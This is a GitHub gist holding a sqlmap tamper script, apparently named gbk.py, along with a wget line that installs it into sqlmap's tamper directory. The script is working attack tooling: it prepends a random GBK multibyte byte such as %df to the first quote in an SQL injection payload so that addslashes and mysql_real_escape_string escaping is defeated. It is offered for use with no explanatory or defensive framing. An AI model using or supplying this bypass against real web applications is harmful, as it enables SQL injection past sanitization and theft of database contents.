Last active
April 24, 2024 14:08
-
-
Save unk9vvn/d8607bd95283b1c9d3c137dcaa7b0a3c to your computer and use it in GitHub Desktop.
GBK Character Encoding for Bypass addslash & mysql_real_escape_string Sanitization Bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # v10 | |
| #coding:utf-8 | |
| # ┌──(unk9vvn㉿e1l1ya)-[~] | |
| # └─$ wget https://gist.githubusercontent.com/unk9vvn/d8607bd95283b1c9d3c137dcaa7b0a3c/raw/7d520d3ec206435d5882cb2930eb442543623716/gbk.py -O /usr/share/sqlmap/tamper/gbk.py | |
| """ | |
| Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) | |
| See the file 'LICENSE' for copying permission | |
| """ | |
| from lib.core.data import kb | |
| from lib.core.enums import PRIORITY | |
| import random | |
| __priority__ = PRIORITY.NORMAL | |
| GBK_Prefix = ['%ef','%df','%bf','%a8','%8c'] | |
| def dependencies(): | |
| pass | |
| def tamper(payload, **kwargs): | |
| global GBK_Prefix | |
| retVal = "" | |
| if payload: | |
| first = False | |
| for i in payload: | |
| GBK_Payload = GBK_Prefix[random.randint(0,4)] | |
| if i == "'" and not first: | |
| retVal += GBK_Payload+"'" | |
| first = True | |
| elif i == '"' and not first: | |
| retVal += GBK_Payload+'"' | |
| first = True | |
| elif i == '`' and not first: | |
| retVal += GBK_Payload+'`' | |
| first = True | |
| else: | |
| retVal += i | |
| return retVal |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment